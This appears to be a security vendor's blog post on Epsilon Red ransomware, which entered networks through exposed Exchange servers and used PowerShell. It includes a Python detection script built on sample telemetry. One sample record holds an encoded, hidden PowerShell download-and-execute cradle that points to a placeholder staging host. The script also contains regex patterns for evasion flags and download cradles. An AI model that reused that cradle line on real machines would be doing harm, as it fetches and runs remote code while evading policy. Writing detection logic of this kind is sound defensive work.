The REvil gang may be behind a brand-new malware variant that explicitly targets enterprise Microsoft Exchange servers to penetrate corporate networks. The new threat relies on a batch of PowerShell scripts weaponized to exploit known vulnerabilities before the final payload is delivered. So far, researchers have confirmed at least one successful attack that ended in a 4.29 BTC ($210,000) ransom payment.
The new player in the malicious arena was identified by Sophos experts in late May 2021 while they were investigating an attack on a US-based hospitality vendor. The analysis reveals that Epsilon Red is a rather simple 64-bit Windows executable written in Go. Its functionality is pared down to file encryption alone, while the other, more sophisticated tasks are farmed out to PowerShell scripts.
According to the Sophos inquiry, the adversaries relied on exposed Microsoft Exchange servers for initial intrusion. It is currently unclear whether they used the ProxyLogon exploit, but the investigation confirms that the targeted server was definitely vulnerable to it. After entering the network, the intruders leveraged Windows Management Instrumentation (WMI) tooling to drop further software onto machines reachable from the Exchange server.
To proceed with the attack, the threat actors used more than a dozen PowerShell scripts that prepare the targeted environment for the ransomware payload and then push and launch the Epsilon Red executable. Notably, the obfuscation applied to these PowerShell scripts is weak and rudimentary, yet it is sufficient to evade detection by popular anti-virus solutions.
Security experts suspect that the infamous REvil gang might be behind the development of Epsilon Red. The key hint for this assumption is the ransom note that pops up on compromised instances: it resembles the one left behind by REvil ransomware, with some additions and grammatical updates. Apart from the ransom note, Epsilon Red has nothing in common with REvil; unique tools and tactics are applied across the attacks.
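The two paragraphs above describe the post-intrusion chain: WMI launching tooling from the Exchange host, followed by lightly obfuscated PowerShell. As an added example (not code from SOC Prime, Sophos, or the Sigma rule mentioned later on this page), the following Python snippet shows how a detection engineer could approximate that behaviour over process-creation telemetry: it flags PowerShell spawned by the WMI provider host or the Exchange IIS worker process, spots common evasion switches, and decodes -EncodedCommand payloads so the rudimentary obfuscation can be inspected. The event records, file paths and the staging URL are constructed for illustration; the field names follow the Sysmon Event ID 1 convention but are an assumption about your log format.

```python
import base64
import re
from typing import Optional


def _encode_ps(script: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of UTF-16LE text; used only to build samples."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed process-creation records in a Sysmon Event ID 1 style.
# Illustrative samples only, not telemetry from the Sophos investigation.
SAMPLE_EVENTS = [
    {  # WMI provider host spawning hidden, encoded PowerShell: the lateral-movement pattern described above
        "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -NoP -W Hidden -Exec Bypass -Enc "
        + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/1.ps1')"),
    },
    {  # Exchange IIS worker process launching PowerShell, consistent with an exposed, exploited Exchange server
        "ParentImage": r"C:\Program Files\Microsoft\Exchange Server\V15\Bin\w3wp.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -c Get-Process",
    },
    {  # Benign: an admin console launched from Explorer with a plain command
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -NoExit -Command Get-Service",
    },
]

# Parents that should rarely, if ever, spawn an interactive shell on an Exchange host (assumed baseline)
SUSPICIOUS_PARENTS = {"wmiprvse.exe", "w3wp.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# -e / -ec / -en / -enc / -EncodedCommand followed by a base64 blob
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
# Switches that hide the window, skip the profile or bypass execution policy
EVASION_FLAGS = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden|-exec(?:utionpolicy)?\s+bypass|-nop(?:rofile)?")
# Typical download-and-run primitives once the command is decoded
DOWNLOAD_CRADLE = re.compile(r"(?i)\bIEX\b|Invoke-Expression|DownloadString|DownloadFile")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or not valid base64/UTF-16LE."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> list:
    """Return the list of indicator names that fire for one process-creation record."""
    indicators = []
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    cmd = event["CommandLine"]
    if image in POWERSHELL_IMAGES and parent in SUSPICIOUS_PARENTS:
        indicators.append(f"powershell_spawned_by_{parent}")
    if EVASION_FLAGS.search(cmd):
        indicators.append("evasion_flags")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        indicators.append("encoded_command")
        if DOWNLOAD_CRADLE.search(decoded):
            indicators.append("download_cradle_in_decoded_command")
    return indicators


def triage(events: list) -> list:
    """Return (event index, indicators) for every record with at least one indicator."""
    hits = []
    for i, ev in enumerate(events):
        ind = analyze_event(ev)
        if ind:
            hits.append((i, ind))
    return hits


if __name__ == "__main__":
    for idx, ind in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(ind)}")
        decoded = decode_encoded_command(SAMPLE_EVENTS[idx]["CommandLine"])
        if decoded:
            print(f"  decoded: {decoded}")
```

The parent-process check is the durable part of this logic: the encoding and switch patterns are cheap for an attacker to vary, whereas WmiPrvSE.exe or w3wp.exe spawning a shell on an Exchange server is anomalous regardless of how the command line is dressed up. Tune SUSPICIOUS_PARENTS against your own baseline before alerting on it.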
To protect your company's infrastructure and prevent possible Epsilon Red infections, you can download a community Sigma rule released by our prolific Threat Bounty developer Sittikorn Sangrattanapitak.
The rule has translations to the following languages:
SIEM: Azure Sentinel, ELK Stack
Tactics: Reconnaissance, Execution
Techniques: Active Scanning (T1595), Command and Scripting Interpreter (T1059)
Since the initial infection vector is suspected to be a Microsoft Exchange server vulnerable to the ProxyLogon exploit, we highly recommend that admins upgrade their installations to the latest secure version ASAP. Threat Detection Marketplace users can also access a set of Sigma rules aimed at ProxyLogon detection to identify existing security holes.
Looking for more threat detection content? Sign up for Threat Detection Marketplace for free and access over 100K curated SOC content items addressing the latest attacks and customized to your environment. Eager to craft your own Sigma rules? Join our Threat Bounty Program and get recurring rewards for your input!